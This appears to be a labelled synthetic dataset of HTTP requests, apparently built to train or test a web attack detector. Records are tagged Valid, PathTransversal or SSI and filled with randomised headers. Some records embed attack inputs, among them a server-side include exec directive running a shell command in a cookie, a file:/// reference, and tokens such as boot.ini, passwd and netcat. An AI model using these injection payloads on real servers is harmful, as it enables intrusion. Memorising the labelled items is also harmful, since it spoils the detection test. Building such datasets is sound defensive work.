Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 83.226.16.116
X-Serial-Number: 5481271353118244328
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16398
Start - Id: 34720
class: Valid
POST /toSwjnvWbDSi3moffQPM/mBNdrop/ctoer/td7AWHdLGE-jfiI7-sbk/n4QfmoejxAlhrcmjda2/9kRQ1qE4Rd4Kki/iB_/ufUntd1.tiff? HTTP/1.1
Content-Length: 112
Content-Language: meed,o
Content-Encoding: gzip
Content-Location: http://fmrsmeA.st/anDud/jsgeeew.htm
Content-MD5: aXd0c2l0bm9zdGRmdmVhUw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Aug 06 11:48:24 UTC
Last-Modified: Thu, 30 Dec 04 15:02:51 UTC
Host: www.oopoqit.de:25613
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-arabic;q=0.9, iso-8859-6;q=0.4, us-ascii;q=0.3, x-mac-greek, hz-gb-2312
Accept-Encoding: gzip;q=0.8, deflate;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 51.127.174.180
Cookie: 9e7elem64ix1r9t= 7ln zooejc;dd=rh=p[Qesrer;ut8ayHwnF7eor=e);osP=konquRz
Cookie2: $Version="53"
Date: Sun, 06 Dec 09 11:10:13 CET
ETag: "ghddgygvcZw2JBfz"
Expect: ekhewk=nqemtdca
From: tta1oTo@Tdedrs.biz
If-Modified-Since: Mon, 05 Jan 09 19:38:12 UTC
If-Unmodified-Since: Wed, 31 Aug 05 16:02:46 GMT
If-Match: "fhvdlKDfX_QV0Pu"
If-None-Match: "@5n0zm83eFNyupzH"
If-Range: Thu, 29 Sep 05 24:21:30 GMT
Max-Forwards: 0
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic bmlHR3BwOm9XbW1NZ28=
Authorization: y3qyv pomge=ncjela
Range: 27601-82680,576792-311040,-975285
Referer: http://www.upeeyRa.uk/h5srocfb/nSoAx4/ctjrNeO/oaAnr/naie.jpeg
TE: trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 2.8; er-sh; rv:1.9.7) Gecko/74776531
UA-CPU: x86
UA-Disp: 550,4531,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 420x8395
Via: FTP/2.5 75.37.205.112:92836
Transfer-Encoding: compress
Upgrade: btCas3/7.1
Warning: 270 www.akhXhs.js "ogdA" "Wed, 23 Dec 09 01:56:59 UTC"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 58172137914902284
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

xthuetn2e=42224&3iy=a3connecteRvbodyto&a41=k)&eeeoIxC=230759&eigxoosy=ms&HM-MT2dropqCEK=6&eeibutoiKot=(r:E

End - Id: 34720
Start - Id: 14135
class: Valid
GET /r9b.tBDh3@8DR/raeiDdM_sV2/knaecih/eR/_0uM98lpdivn/sfsYKE.FBFp/twafRdyvITIQfH/6tshdssnetr4c/d_t0wDVA0QS3zKXjMbwE/tFU8X/ehyrlaetqs/o4OxzFtdwYHXRk0.tiff? HTTP/1.1
Host: 230.157.164.88
Connection: keep-alive
Accept: image/gif;q=0.7
Accept-Charset: koi8;q=0.2, x-mac-icelandic;q=0.9, iso-2022-kr;q=0.6
Accept-Encoding: identity;q=0.5, compress;q=0.8, gzip, gzip;q=0.9
Accept-Language: ef2wI-isudis9u, uhhmpehc-m2e;q=0.5, mEoO-2nsn;q=0.0, tluagHqh-Rlunwts
Cache-Control: max-age=65228
Client-ip: 229.154.70.33
Cookie: ieusaooeafNho=0;Rdahcrogar4Ese=27911216;rwxl=9 libTa
Cookie2: $Version="97"
Date: Mon, 01 Mar 04 10:16:40 UTC
ETag: "O8btEY7U1Zj.UP@R3"
Expect: 100-continue
From: zess@lSzAtt.de
If-Modified-Since: Wed, 27 Jul 05 23:48:06 UTC
If-Unmodified-Since: Sat, 04 Dec 04 14:42:53 CET
If-Match: "2Qq7.Mr.rZYn1Ddj"
If-None-Match: *
If-Range: "SHGZkBXcEmDEUMX-bIR8"
Max-Forwards: 0
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM ZDl5ZW1jb2Zld21yaWhxNllnOHQxYWllaFlvZmVicnBl
Authorization: NTLM Z2w3QWllbmVEb250MWFwbW9nZXBkQjhhbnRpOGVtdnJhZE9hNGVJaA==
Range: 717-1161
Referer: /t6jhoetU/ietd/ogSeYa.conf
TE: trailers,deflate;q=0.1,gzip;q=0.5
Trailer: Trailer
User-Agent: bbv0qrWU http://www.psbRc.biz
UA-CPU: x86
UA-Disp: 366,5288,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9889x502
Via: 4.6 www.atiagA.html
Transfer-Encoding: 7o0vo
Upgrade: e2es/4.2, i4o/1.0, H5unol/4.6, puffs/2.0
Warning: 021 63.233.31.79 "yeinsrEe0N9" 
X-Forwarded-For: 143.221.88.228
X-Serial-Number: 76880037963777825874
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14135
Start - Id: 27824
class: Valid
GET /e83uyhtihwknnbwruh/Dpe8Bq3/tlhiasdaTyohSnlmcr/ibd0eaokNjlxtew.asmx?LrdenoAtaosign=tdeT6nhoenf0g&ymceoi=1315639 HTTP/1.1
Host: www.jl5g.be
Connection: close
Accept: text/*;q=0.3, text/*, image/*
Accept-Charset: koi8-r;q=0.8, windows-1254, iso-8859-5;q=0.0
Accept-Encoding: compress;q=0.5, gzip, compress;q=0.7, gzip;q=0.3, identity
Accept-Language: ypSnfeb-Ads, lbtKaoCi-etcs, qIeZi-lYeerra, thei-r;q=0.3
Cache-Control: no-transform
Client-ip: 102.45.50.188
Cookie: TByihNb=1476
Cookie2: $Version="51"
Date: Sat, 17 Oct 09 18:00:56 GMT
ETag: W/"Uqzq_2T@iJjTyO8QE3WH"
Expect: 100-continue
From: eoutita@teO2ooe.com
If-Modified-Since: Wed, 14 Nov 07 03:33:16 UTC
If-Unmodified-Since: Wed, 27 Jul 05 18:14:30 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 6687
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM bmFoMTFUcmFySWZ1cjNlaGVvdHphZWl1ZXNzaGx0dHNvdHROZVQydGFsYzJlZUU=
Authorization: Basic c2hjRG50ZTpyZTlv
Range: -39341,-175784
Referer: http://www.roegh.it/cv0nflc.nsf
TE: chunked,trailers
Trailer: TE
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 9.1; hn-os; rv:0.7.9) Gecko/85927102
UA-CPU: x86
UA-Disp: 159,4098,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 370x5547
Via: 7.3 www.sstsa3ap.htm, 7.2 www.2migutao.png
Transfer-Encoding: ubatk8; mitciy=eifv0ee2
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 92325368257
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27824
Start - Id: 44711
class: PathTransversal
PUT /iPsY/tdE1_qOf/422Q0XJUI_script/2w2sEbseh95r/iDPW.bin? HTTP/1.1
Content-Length: 104
Content-Language: 6e
Content-Encoding: compress
Content-Location: /cgaeeA/dmiI.ace
Content-MD5: dGFsc242cm9ud2Jvc2lpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Jun 08 14:44:43 CET
Last-Modified: Fri, 04 May 07 01:21:53 GMT
Host: 212.172.58.252
Connection: keep-alive
Accept: video/mpeg;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 230.63.102.101
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="2"
Date: Sat, 03 Apr 10 13:10:41 CET
ETag: "plt73QUn8kWDZLJVBbM"
Expect: 5teotwi=c4dkufDm;eodxa=0orrzrci
From: Lsoa@meyumffmar.uk
If-Modified-Since: Thu, 10 Feb 05 01:59:17 CET
If-Unmodified-Since: Wed, 06 Oct 04 07:36:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.9
Pragma: wHoo8pu=6ls
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic TmFycjowR3RZaA==
Range: 8542-,-709
Referer: /wInohi.pl
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: dnwsottne/0.5
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: deflate
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 321 92.208.70.203:11 "elAnigceatyit1" "Sun, 21 Nov 04 10:31:52 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sriNaysf=<7Qlt oopens2w(dfit &eotzUn=928061&e3aXdu59N=file:///n:/go/esde/ora780h.xml

End - Id: 44711
Start - Id: 7310
class: Valid
PUT /IjDnelmdoSt/odGwvJvo73ZtAZBqnezb/allD/copyH/oeOder/5zb/oEi/ieleJAhesbsnast3i/nvlHx4bqgG1hU7XP/eU6ee9qA8c3KJKDpGf/t2wHaPaYrH4ohk8tROPE/pCdFQav.php4? HTTP/1.0
Content-Length: 166
Content-Language: qet1dr,ffnitetI,eenveoti
Content-Encoding: deflate
Content-Location: /ihNyrdtt/rN8orahc.php3
Content-MD5: SGFhZXRlQXNvQWdvMm4ybw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Dec 07 13:07:04 CET
Last-Modified: Fri, 03 Apr 09 22:40:40 GMT
Host: www.xtann6lis.uk:80
Connection: je6eprOn
Accept: text/xml, audio/x-wav;q=0.1, text/*
Accept-Charset: windows-1253, windows-1257;q=0.8, koi8-r;q=0.9, cp-950
Accept-Encoding: 
Accept-Language: sdoEle-h;q=0.4, fli72d-n;q=0.2, es5froi-tthry;q=0.1
Cache-Control: no-cache
Client-ip: 17.44.116.170
Cookie: jnQFwmtxnbetween_=1330;Xldrn6dgL8oihle=sY0;inTnOetejntgug=eakld;lRthKu2sa=29oe;UhavingD@W=hh8;cta9t2il=02587
Cookie2: $Version="837"
Date: Sun, 13 Mar 05 03:17:05 UTC
ETag: W/"QEY5Oyp3iSSgAFKYh44b"
Expect: tsuNiea=xynPiefx
From: ha4h@ntbt8vhFn.cz
If-Modified-Since: Mon, 04 May 09 24:54:30 CET
If-Unmodified-Since: Fri, 28 Apr 06 02:03:34 GMT
If-Match: "2ziqTYB-hhoFBw.xz42Y"
If-None-Match: *
If-Range: "ygyKz29gSAtBTJWuxiG"
Max-Forwards: 186
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic cnpzY2RuTzplRXVv
Range: 843670-7300,78-
Referer: /e66o/k1erh/etrzu/9ync/hsez.jpeg
TE: trailers,chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: ex0tmr/4.2.5.9
UA-CPU: 68000
UA-Disp: 4520,707,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1302x7380
Via: 6.0 www.eswnIAn.png
Transfer-Encoding: deflate
Upgrade: Pcr/6.7, asmrbh/9.1, ayi/9.1
Warning: 465 193.0.29.240 "9tdbganttoetamdoth" 
X-Forwarded-For: 180.148.168.191
X-Serial-Number: 83189870004796915
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

coN69=tsh&nfr4gcFZ=003239&douejtaiaxhhe=ucl&osenaTehlc7d=14603&baetbzeypeobra=x1vanetcat&te4flrA=5299&noe=516801&afQ9bHsYgRaRN=tbWiHw0k&rossatkoh=access_log42htaccesl

End - Id: 7310
Start - Id: 20293
class: Valid
GET /oKEubgsound.shtml?grtnot9metfike=796700&nipxndar=687648 HTTP/1.1
Host: www.sElmEeh.cz:0
Connection: close
Accept: image/*;q=0.0
Accept-Charset: iso-8859-8-i;q=0.1, x-mac-hebrew;q=0.0, x-mac-chinesetrad
Accept-Encoding: gzip, gzip;q=0.5, identity, gzip;q=0.5, deflate;q=0.2
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 140.81.23.184
Cookie: CFe5anettyh=71624651
Cookie2: $Version="4"
Date: Mon, 14 May 07 05:22:16 CET
ETag: W/"idK2rQ563WzVLVCFlS"
Expect: tetn18re=iUidv
From: fdodSeh@hPgZsaieey.fr
If-Modified-Since: Tue, 26 Sep 06 14:46:35 CET
If-Unmodified-Since: Thu, 22 Mar 07 05:57:26 UTC
If-Match: "Jba-@QGkUHWN9TwfboX"
If-None-Match: *
If-Range: Mon, 22 Aug 05 23:51:16 UTC
Max-Forwards: 6139
MIME-Version: 5.4
Pragma: Nn=etSels
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: Digest username="velhSN0n"
Range: 8-31,-2,-9878
Referer: http://www.shHno8me.com/spi2/ax84te/himsEtsc/mwoLbhc.jsp
TE: chunked;q=0.3,trailers,deflate;q=0.0
Trailer: Transfer-Encoding
User-Agent: ek07VcT http://www.mg0ruzc.com
UA-CPU: PowerPC
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 4.4 105.212.58.253, HTTP/5.6 www.ah8hi.jpg
Transfer-Encoding: compress
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 704 226.239.247.176 "haitfs" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20293
Start - Id: 28270
class: Valid
GET /q-Xq.NaoHs/anoyteehcda10alqoe/daamsptnrsiEo3/Rabgbiuirtpner/AR2ltwS/aiQtY1A@a.Mp1/eO8aE5odd4rmm6n6ts/iF1GRYwUGvYkT2bXx/inBe0d5eeaugdtse/_1PAN7uWK7fQyNY/p7iagzz/u1s_z.aspx?dISDo.J=ft++niastautoexeclax7t&scesyee1mj=086179&afibazsN=0273&29passwdns1PMYwindow.openp=dcattn+9ncma%5Clinks%3Bbu%29R%29%27X&1A@sMusrUEtEN=%5Bcubn&uwexe=+1&ohsoemdh3=%2Fid%25sisryccconnect&73agdi=mQ1NwxIaR&ieoesReEntLer=719 HTTP/1.1
Host: 94.95.196.38
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: 1qhebyed=ihxl
Client-ip: 187.69.231.51
Cookie: hra17mhnr=39;_DhF=stg
Cookie2: $Version="5"
Date: Tue, 23 Feb 10 13:50:06 GMT
ETag: "2fXL_y5bCBBhA@GLyTH"
Expect: ktlcms
From: 5csa@fmp5trUl.cz
If-Modified-Since: Mon, 31 Oct 05 09:50:09 UTC
If-Unmodified-Since: Fri, 17 Apr 09 06:48:37 UTC
If-Match: "qC74DoDVE5H8FrxoSx"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.9
Pragma: 8nop='oew4t'
Proxy-Authorization: eotn c3ei=whZbs
Authorization: Basic c3ppaGVuOjdlRGRjdw==
Range: 3-15771,8-
Referer: /puje2/9oeit8h/ehirtrtg/Aodjrhar/tehpansD.sh
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: ojz13ZWJw http://www.6ddineCl.biz
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0895x834
Via: FTP/4.2 67.15.243.204:7, 6.5 www.4axeei6r.tiff:9, HTTP/8.7 www.snlb1F.htm
Transfer-Encoding: compress
Upgrade: nnn2/7.8, Womosa/1.7, mtef/4.0, idsabe/8.3, zyI/9.3
Warning: 051 192.13.0.133 "ymutadsNy" "Wed, 14 May 08 13:03:11 UTC"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28270
Start - Id: 24864
class: Valid
GET /ttkaHde/qM1/ani/pm/qA.dNVgLzchPcKs/Lzammhusroho/4K7e0B.c/im2jdJ.asmx?uJ4iIA=ttC&7OfLNFW7iframeC=2325&3Vo3=hc7llscmaen3&eetudWjqesun=107529&uegvLenate3lus=sR0cHby%404&oqTyqnsdifni1u=s4eDNwdVyKg&rW4tmpgJnvar4S-id=68041540&O1drop-=164091&FUzx=49&freuo1gm=logsmfdmochaoapnedAt%7C&mlzscujn=ossflvbscript6eednt1+ri&XgT8boot.ini.HzaSk=+gnetcat HTTP/1.1
Host: www.vms1eteq.it:80
Connection: M6Cemps
Accept: */*
Accept-Charset: euc-kr, x-mac-roman;q=0.1, iso-8859-15;q=0.0
Accept-Encoding: 
Accept-Language: 8sErH9Rc-scps14;q=0.9, odtyAt-a, lveeama-N;q=0.8
Cache-Control: no-store
Client-ip: 129.140.154.30
Cookie: ow=3oaaktrtnt;Egs31qR=094995
Cookie2: $Version="6"
Date: Mon, 05 May 08 16:53:38 GMT
ETag: W/"FpNzx_iVoM1opmx3"
Expect: Ohnisszs
From: lbiirsi@cItHg4s.uk
If-Modified-Since: Tue, 03 May 05 07:54:21 CET
If-Unmodified-Since: Sat, 27 May 06 09:03:00 CET
If-Match: "jilXc5QIhnbbJSEK0c9"
If-None-Match: "aqW5-fmPp7Hw7yF-mQWE"
If-Range: Thu, 11 May 06 05:38:31 GMT
Max-Forwards: 9992
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic YWJlcmR2azpuNmphZW4=
Authorization: NTLM RXJlNGRwcm9waTN0ZWFyYWl1aXJwd2hzNWdvc2VwaG9oZ2VTRndlMQ==
Range: -94
Referer: /vamRoTrl/n5ed41.jpeg
TE: chunked;q=0.6,deflate,trailers
Trailer: Accept-Encoding
User-Agent: bjzn1fl- http://www.nacdaltl.org
UA-CPU: MIPS
UA-Disp: 139,614,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 265x4380
Via: oletU/1.5 www.eotrs.html
Transfer-Encoding: lhsa; NttOIiie=tai9f
Upgrade: htg0Oe/2.3, CC7t1n/7.2, a9jg/6.9
Warning: 569 www.oq8ot.css "draaicTya4hanxeos" 
X-Forwarded-For: 117.106.89.58
X-Serial-Number: 6519441823868063774
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24864
Start - Id: 24387
class: Valid
GET /ahatetPeoocnsliO8/lXWs1rQv5/ozQhfN/eeLBHsjbY8Qs2VFxuz/23zB/m_w8s@CgSmSo8xb/ap/xwusr5KgWMboot.iniaKE17.dll?ZTUobP%up=64159661&dWnn6bCnsssR=JoetH&68zoe8nt1ae8eP=83&xrcpweZinput=233081&atZv4rehNntdv=15208&nefa9h2atiE=OcdS1iframeNbarellymsmail&JeautoexecE6=oeEpoRho&aud=lz HTTP/1.0
Host: www.oomt.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9, compress, identity;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 248.165.100.251
Cookie: KQLTAQ_T@usrUG=35153;emmavic6evwf5=tnTEZ_q0u;childJ@OFMN=libhe
Cookie2: $Version="656"
Date: Thu, 21 Feb 08 05:31:11 CET
ETag: "9dciFh3KeV@7.KxaU4"
Expect: cNyhm=tkhT
From: Tieh@ettdu.fr
If-Modified-Since: Sat, 29 Jan 05 15:18:27 UTC
If-Unmodified-Since: Wed, 04 Apr 07 19:19:25 UTC
If-Match: "4iWq2LwmBajC4HkWh1w1"
If-None-Match: *
If-Range: Sun, 06 Aug 06 18:42:09 GMT
Max-Forwards: 198
MIME-Version: 3.6
Pragma: ounoet='5ofe'
Proxy-Authorization: Z4ne on7b=txiesh
Authorization: euev oKctdIEi=Sx5l9a
Range: 18-
Referer: /rnvny9oo.mdb
TE: gzip
Trailer: Trailer
User-Agent: caeamog (dV6jzUn3; tr@tbRU; az3_3Dw8kE; pr7-A0oe_; vYpTOI7RvN)
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: deflate
Upgrade: bf6/1.0, t7Oteo/2.2, sdo/9.0, olyo2o/7.4, ivryva/4.0
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24387
Start - Id: 40216
class: SSI
POST /3ckI/etrRcft4leumE2f/aRqaT7ti/mxmi8vqJ/insimo14nise/tHt8yFY-i.mdb? HTTP/1.1
Content-Length: 104
Content-Language: tdt,74khieE
Content-Encoding: deflate
Content-Location: /m9nhe/ctiqmy.mp3
Content-MD5: aW5yNWVuaW41MTRsZWxnaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Jan 08 12:10:40 GMT
Host: 222.33.216.93
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-1250;q=0.3, koi8-r, windows-1258;q=0.7, iso-10646-ucs-2, euc-kr
Accept-Encoding: gzip, identity, compress;q=0.2, gzip;q=0.5, identity
Accept-Language: *
Cache-Control: O=lel2uiS
Cookie: smlerreiIisad=csd;5mdqsoaedt=orVtpte0erEhr;pcfBLRmgkn=<!--#exec     cmd="/bin/ls    -l    /home/4Llnzuvba/hsO"     -->;7mettmPtbvttowe=sdroprtmpEo%io+
Cookie2: $Version="15"
Date: Sat, 13 Aug 05 05:35:28 UTC
ETag: "S6WzxILFWwTb2Ut8o._"
From: hs0teHen@ru4d.net
If-Modified-Since: Mon, 30 Jun 08 13:47:25 UTC
If-Unmodified-Since: Sat, 10 Dec 05 15:47:37 UTC
If-None-Match: "QrpWm@SUDxcZpYsn"
If-Range: Sun, 23 Dec 07 15:51:32 CET
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Authorization: Digest nc=b03edfbd
Referer: /tb5abhih/preynSo.wmn
TE: trailers,deflate;q=0.2
Trailer: Connection
User-Agent: 7PxTX3 http://www.spxIt.com
UA-CPU: StrongARM
UA-Disp: 0733,7918,8
Via: FTP/2.7 123.18.57.166, 8eaon/6.7 174.205.185.193, FTP/4.3 159.25.247.187
Upgrade: cEOtae/0.3
Warning: 352 www.rt0dic.htm:27 "iOefoiwpe5htYvn" "Fri, 11 May 07 16:23:26 UTC"

tof2ma8j=530&eis2agrsc72if=82081088&atsEztaae1miYX9=qluubjNst9E&it=8392735995&jndeshrr=6cp2adatli5eItt6w

End - Id: 40216
Start - Id: 11662
class: Valid
GET /uvHsSV/sJrlHnerDAidDteNt/pkeannr/fyzZ/NQjfPiniandRW.S/37u6nyOEnpr2wa/lSwBnK-OM907Kblpu5C/yq4I/cBhtpasstzLZeyNO.NQ/twHmMtV5yEq3I76e/LOubhB/7W77XmG.css?3fMP=nt.N4fMSxnJ8&rta9=oeeYn%3Auttlogi+havingcadmin%7Cb%3B&lre0ttb=rnt%28tk0-u&ein5ad=5157632447&aec6inec=ebdo1tNEkipL&vgrsSliSos=tolotamfwnetcatfroi&tsctpsBnnd5e=admini&66SXTPIlj=ogo1ncn2%27%3Ezha&iedpe5obu=51&uirnqB=Orcp&roinltegyr=hwy%7C&TIasghnsewheoa=3241768 HTTP/1.0
Host: 96.73.247.24
Connection: keep-alive
Accept: audio/basic;q=0.4, video/quicktime, text/html
Accept-Charset: cp-950, iso-2022-kr, x-mac-japanese, windows-1257;q=0.5
Accept-Encoding: 
Accept-Language: oiA6-ote, lN6oe0m-oaypyjdu
Cache-Control: no-cache
Client-ip: 38.112.56.235
Cookie: rtRer=2;manwho5b=sobrfdisg;raws=89941726;l1dI=65;cmlehtess=< ;sq=y5eenx460dorh
Cookie2: $Version="0"
Date: Tue, 12 Sep 06 11:53:21 CET
ETag: "sqYjr0uylAea_g5"
Expect: sgrlseo
From: ufw0isn@wEgaa4o.uk
If-Modified-Since: Sun, 18 Jan 09 14:33:22 UTC
If-Unmodified-Since: Sun, 19 Sep 04 19:57:42 GMT
If-Match: "AzWFxez1kpv7E_@"
If-None-Match: *
If-Range: Thu, 10 Sep 09 14:43:15 GMT
Max-Forwards: 9
MIME-Version: 2.8
Pragma: trgolhd='eu1dB'
Proxy-Authorization: Basic dXRybmsyOm5ldGljdA==
Authorization: 8blen Uiroom=eiiho
Range: 93-2855,61-3
Referer: http://uhilu.org/uaoo/ciYffoe/2o6l/tata1oR/Eherhe.txt
TE: chunked;q=0.0,deflate;q=0.6,trailers
Trailer: Pragma
User-Agent: tbocAa (oSgA9O; rJNi0rAlS)
UA-CPU: PowerPC
UA-Disp: 4467,233,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 178x213
Via: FTP/5.7 140.143.127.141, HTTP/2.4 www.otyedi.jpeg, 9.3 www.edybra.shtml
Transfer-Encoding: identity
Upgrade: iocd/6.9, Dmvo/9.9, oft/0.7, lu4Hrr/7.4
Warning: 062 147.28.128.111 "yeya0Tla6en" 
X-Forwarded-For: 106.177.217.179
X-Serial-Number: 7331702860784
----: -------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 11662
Start - Id: 14372
class: Valid
GET /g5e/eG-lPAOelKrkC77CZ/smkgr4/usjRU3FWuz@hY_86TaCK/eivOereeeeesmli/I3SM3j7l/d5h8O4Les_dUn4/hw8zER@Ws7q3pRS/mK3WXryv6KX.dll?rmsrg6n2iw=5201550&8qs9Rxlocation0-=30&1Aurtv1smQ9r=iVP-S&nI@bgsoundFe=%3CUe&atjni4dfewNeaw0=9981&dczt5t=0&akr=%7C0a0dsaprocessing-instructionli%25%25A+lsystemnz%40w&Zinsert-kglibgV=1063478&W@7@cmd8b=15396&kiaeicep3eb8wo8=wiruilelaidaAAs&7s4vpW=fcdt8 HTTP/1.0
Host: 109.150.161.231:80
Connection: close
Accept: application/rtf;q=0.2, video/mpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: sentrphF-d;q=0.9, ttin7ca-hvi2l;q=0.9, enrhru-zntemn, 61noe-su;q=0.8
Cache-Control: no-cache
Client-ip: 73.0.30.18
Cookie: Ys7oMcd=hnbloand;hesr5xoie=ee;jiNro=oeA8c2osnao;gain=>
Cookie2: $Version="850"
Date: Tue, 10 Jun 08 01:25:52 CET
ETag: "kvuG0ZwPtPj5zl2bUyer"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Thu, 23 Nov 06 19:31:09 CET
If-Unmodified-Since: Fri, 09 Dec 05 11:27:53 GMT
If-Match: "GN1MYfPXl2QPDOI3"
If-None-Match: "Nsbcom9gxDVnEg9C9yz6"
If-Range: Sat, 31 Jan 09 24:41:19 GMT
Max-Forwards: 1
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest username="Ps5he"
Range: 6-1981,-825951,-3
Referer: http://xcydva.cz/wmnJeite/reUtiOae/asord7e.gif
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 2.5; bd-eh; rv:5.8.0) Gecko/37090902
UA-CPU: StrongARM
UA-Disp: 566,1872,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8463x313
Via: 0.4 www.Enmbti.gif
Transfer-Encoding: identity
Upgrade: wheId8/6.7, oho/8.8, eubuhs/7.6
Warning: 602 www.usoFyOoy.jpg:8520 "Eoitcrxehi3nma6uas" "Wed, 04 Jul 07 21:38:06 GMT"
X-Forwarded-For: 54.65.208.97
X-Serial-Number: 24080640322850948511
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14372
Start - Id: 31014
class: Valid
GET /ka5osrimn/sGY0/md-/e0rC@akuGXm3G.dG/6VsVV9fGRta/uoplyoueelmElan4cr/9j0dcmd/RechopvLet/yNwinntjx2Kd%u.bin?rcckanhf=jknd+ny&qcbeNU=9&Kv5BTwindow.open8nNFconnect1=uie&YNuAhuW=9734368953 HTTP/1.1
Host: 215.228.0.182
Connection: keep-alive
Accept: text/xml, application/*
Accept-Charset: x-mac-icelandic;q=0.5, euc-cn
Accept-Encoding: compress
Accept-Language: etnIpcre-hew6t;q=0.5, tisE-gamiw, a-iouih, kpqotee-einahsl, tt6a2a-j;q=0.4
Cache-Control: no-transform
Client-ip: 154.71.85.33
Cookie: NEsq=4471;3IE9PBwd=4
Cookie2: $Version="835"
Date: Tue, 01 Nov 05 04:23:09 CET
ETag: W/"RQ5xhFlWo_4aXrfmvpO"
Expect: 100-continue
From: tasm@izst.st
If-Modified-Since: Sat, 24 Apr 04 15:37:08 GMT
If-Unmodified-Since: Sat, 15 Apr 06 03:58:38 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 640
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="VltR"
Authorization: Basic YXNlcm91aWQ6cm5zRW5Ebm8=
Range: 74-93290,6-30238
